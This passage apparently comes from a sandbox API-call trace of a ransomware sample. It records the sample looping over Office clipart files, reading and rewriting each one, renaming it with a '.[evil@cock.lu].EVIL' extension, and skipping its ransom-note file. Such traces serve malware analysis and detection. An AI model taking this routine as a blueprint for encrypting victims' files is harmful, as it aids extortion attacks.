lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.218] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0153.218] CloseHandle (hObject=0x1a8) returned 1 [0153.218] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.218] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.219] __uncaught_exception () returned 0x84b1160800 [0153.219] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.219] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf.[evil@cock.lu].evil")) returned 1 [0153.220] ??_V@YAXPEAX@Z () returned 0x1 [0153.223] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF", dwFileAttributes=0x200) returned 0 [0153.223] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.223] wcsstr (_Str="J0241773.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.224] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF") returned 69 [0153.224] wcscmp (_String1="J0241773.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.224] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241773.WMF") returned 0x0 [0153.224] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF") returned 0x45 [0153.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.233] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcbe, lpOverlapped=0x0) returned 1 [0153.254] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.254] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.254] _errno () returned 0x84b1160840 [0153.254] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.254] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcc0, lpOverlapped=0x0) returned 1 [0153.255] CloseHandle (hObject=0x1a8) returned 1 [0153.255] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.255] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.255] __uncaught_exception () returned 0x84b1160800 [0153.255] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.256] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf.[evil@cock.lu].evil")) returned 1 [0153.257] ??_V@YAXPEAX@Z () returned 0x1 [0153.260] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF", dwFileAttributes=0x200) returned 0 [0153.260] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.261] wcsstr (_Str="J0241781.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.261] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF") returned 69 [0153.261] wcscmp (_String1="J0241781.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.261] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241781.WMF") returned 0x0 [0153.261] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF") returned 0x45 [0153.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.263] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7b2, lpOverlapped=0x0) returned 1 [0153.273] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.273] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.273] _errno () returned 0x84b1160840 [0153.273] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.273] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c0, lpOverlapped=0x0) returned 1 [0153.273] CloseHandle (hObject=0x1a8) returned 1 [0153.273] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.274] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.274] __uncaught_exception () returned 0x84b1160800 [0153.274] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.274] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf.[evil@cock.lu].evil")) returned 1 [0153.275] ??_V@YAXPEAX@Z () returned 0x1 [0153.278] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF", dwFileAttributes=0x200) returned 0 [0153.279] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.279] wcsstr (_Str="J0250504.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.279] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF") returned 69 [0153.279] wcscmp (_String1="J0250504.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.279] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0250504.WMF") returned 0x0 [0153.279] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF") returned 0x45 [0153.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.282] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7938, lpOverlapped=0x0) returned 1 [0153.346] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.346] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.346] _errno () returned 0x84b1160840 [0153.346] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.346] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7940, lpOverlapped=0x0) returned 1 [0153.346] CloseHandle (hObject=0x1a8) returned 1 [0153.658] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.658] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.658] __uncaught_exception () returned 0x84b1160800 [0153.658] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.658] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf.[evil@cock.lu].evil")) returned 1 [0153.659] ??_V@YAXPEAX@Z () returned 0x1 [0153.662] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF", dwFileAttributes=0x200) returned 0 [0153.662] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.662] wcsstr (_Str="J0250997.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.662] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF") returned 69 [0153.662] wcscmp (_String1="J0250997.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.662] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0250997.WMF") returned 0x0 [0153.662] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF") returned 0x45 [0153.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.664] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6958, lpOverlapped=0x0) returned 1 [0153.667] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.667] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.667] _errno () returned 0x84b1160840 [0153.667] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.667] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x6960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6960, lpOverlapped=0x0) returned 1 [0153.667] CloseHandle (hObject=0x1a8) returned 1 [0153.667] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.667] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.667] __uncaught_exception () returned 0x84b1160800 [0153.667] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.668] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf.[evil@cock.lu].evil")) returned 1 [0153.668] ??_V@YAXPEAX@Z () returned 0x1 [0153.671] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF", dwFileAttributes=0x200) returned 0 [0153.671] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.671] wcsstr (_Str="J0251007.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.671] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF") returned 69 [0153.671] wcscmp (_String1="J0251007.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.671] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0251007.WMF") returned 0x0 [0153.671] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF") returned 0x45 [0153.671] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.673] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1100c, lpOverlapped=0x0) returned 1 [0153.687] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.687] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.687] _errno () returned 0x84b1160840 [0153.687] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.687] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11020, lpOverlapped=0x0) returned 1 [0153.688] CloseHandle (hObject=0x1a8) returned 1 [0153.688] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.688] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.688] __uncaught_exception () returned 0x84b1160800 [0153.688] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.688] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf.[evil@cock.lu].evil")) returned 1 [0153.689] ??_V@YAXPEAX@Z () returned 0x1 [0153.692] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF", dwFileAttributes=0x200) returned 0 [0153.692] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.692] wcsstr (_Str="J0252629.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.692] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF") returned 69 [0153.692] wcscmp (_String1="J0252629.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.692] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0252629.WMF") returned 0x0 [0153.692] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF") returned 0x45 [0153.692] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.694] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xae2, lpOverlapped=0x0) returned 1 [0153.701] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.701] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.701] _errno () returned 0x84b1160840 [0153.701] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.701] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb00, lpOverlapped=0x0) returned 1 [0153.701] CloseHandle (hObject=0x1a8) returned 1 [0153.701] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.701] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.702] __uncaught_exception () returned 0x84b1160800 [0153.702] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.702] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf.[evil@cock.lu].evil")) returned 1 [0153.703] ??_V@YAXPEAX@Z () returned 0x1 [0153.705] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF", dwFileAttributes=0x200) returned 0 [0153.705] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.705] wcsstr (_Str="J0252669.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.705] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF") returned 69 [0153.705] wcscmp (_String1="J0252669.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.705] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0252669.WMF") returned 0x0 [0153.705] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF") returned 0x45 [0153.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.711] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf56, lpOverlapped=0x0) returned 1 [0153.713] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.713] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.713] _errno () returned 0x84b1160840 [0153.713] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.713] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf60, lpOverlapped=0x0) returned 1 [0153.713] CloseHandle (hObject=0x1a8) returned 1 [0153.714] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.714] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.714] __uncaught_exception () returned 0x84b1160800 [0153.714] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.714] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf.[evil@cock.lu].evil")) returned 1 [0153.715] ??_V@YAXPEAX@Z () returned 0x1 [0153.718] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF", dwFileAttributes=0x200) returned 0 [0153.718] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.718] wcsstr (_Str="J0278702.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.718] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF") returned 69 [0153.718] wcscmp (_String1="J0278702.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.718] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0278702.WMF") returned 0x0 [0153.718] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF") returned 0x45 [0153.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.720] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf6a, lpOverlapped=0x0) returned 1 [0153.722] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.722] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.722] _errno () returned 0x84b1160840 [0153.722] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.722] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf80, lpOverlapped=0x0) returned 1 [0153.723] CloseHandle (hObject=0x1a8) returned 1 [0153.723] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF", _Mode="a", 